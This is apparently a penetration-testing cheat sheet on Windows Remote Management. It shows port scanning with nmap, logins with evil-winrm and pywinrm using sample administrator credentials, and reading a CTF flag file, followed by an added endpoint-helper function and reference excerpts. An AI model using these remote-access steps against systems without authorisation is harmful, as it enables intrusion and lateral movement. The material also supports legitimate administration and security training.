WinRm : Enter-PSSession / evil-winrm
ports:
5985 (HTTP) and 5986 (HTTPS) (Below Windows 7: 80 and 443)
# finding open ports
nmap -p5985,5986 -iL computers.txt -Pn -v
# Connect from Linux
evil-winrm -i Server01 -u USER -p PASS
# Connect from Windows
Enter-PSSession Server01
# automation (python3)
# pip install pywinrm # (see ref for optional deps, e.g. Kerberos)
# ref: https://pypi.org/project/pywinrm/
import winrm

# NTLM auth against the default HTTP listener (port 5985); target is the host/IP
session = winrm.Session(
    '10.10.10.10',
    auth=(
        'administrator',
        'badminton'
    ),
    transport='ntlm'
)
# run a PowerShell command; std_out/std_err are bytes
r = session.run_ps("whoami")
print(r.std_out)
print(r.std_err)
# run a cmd.exe command (pywinrm's method is run_cmd, not run; use a Windows path)
print(session.run_cmd(r"type C:\Users\mike\Desktop\flag.txt").std_out)
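A small helper that ties the port table above to the pywinrm session: it builds the WS-Man endpoint URL for the chosen listener (HTTPS on 5986 with certificate validation being the preferable choice, legacy 80/443 for pre-Windows 7 hosts) and returns the exit status plus decoded output instead of raw bytes. This is an added example, not code from the page or the pywinrm project; the names winrm_endpoint and run_remote are hypothetical, and Server01/USER/PASS are placeholders.

```python
# Added example (not from the original page): endpoint selection + result handling for pywinrm.
from typing import Optional, Tuple

# Default WinRM ports: (use_https, legacy) -> port; "legacy" means below Windows 7.
DEFAULT_PORTS = {
    (False, False): 5985,
    (True, False): 5986,
    (False, True): 80,
    (True, True): 443,
}


def winrm_endpoint(host: str, use_https: bool = False,
                   legacy: bool = False, port: Optional[int] = None) -> str:
    """Build the full WS-Man URL pywinrm accepts as target (scheme://host:port/wsman)."""
    scheme = "https" if use_https else "http"
    port = port or DEFAULT_PORTS[(use_https, legacy)]
    return f"{scheme}://{host}:{port}/wsman"


def run_remote(endpoint: str, user: str, password: str, command: str,
               powershell: bool = True, transport: str = "ntlm",
               cert_validation: str = "validate") -> Tuple[int, str, str]:
    """Run one command over WinRM; return (status_code, stdout, stderr) as text."""
    import winrm  # imported here so winrm_endpoint() works without pywinrm installed
    session = winrm.Session(endpoint, auth=(user, password),
                            transport=transport,
                            server_cert_validation=cert_validation)
    # run_ps wraps the command in PowerShell; run_cmd sends it to cmd.exe
    r = session.run_ps(command) if powershell else session.run_cmd(command)
    return (r.status_code,
            r.std_out.decode(errors="replace"),
            r.std_err.decode(errors="replace"))


if __name__ == "__main__":
    ep = winrm_endpoint("Server01", use_https=True)          # placeholder host
    code, out, err = run_remote(ep, "USER", "PASS", "whoami")  # placeholder creds
    print(code, out.strip(), err.strip())
```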
About WinRm
Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers.
To start an interactive session with a single remote computer, use the Enter-PSSession cmdlet. For example, to start an interactive session with the Server01 remote computer, type:
Enter-PSSession Server01
~ Microsoft Docs [1]
Microsoft has implemented the WS-Management standard in Windows Remote Management 1.1 (WinRM)
By default WinRM HTTP uses port 80 and HTTPS uses port 443. On Windows 7 and higher the default ports are 5985 and 5986, respectively.
~ Wikipedia [2]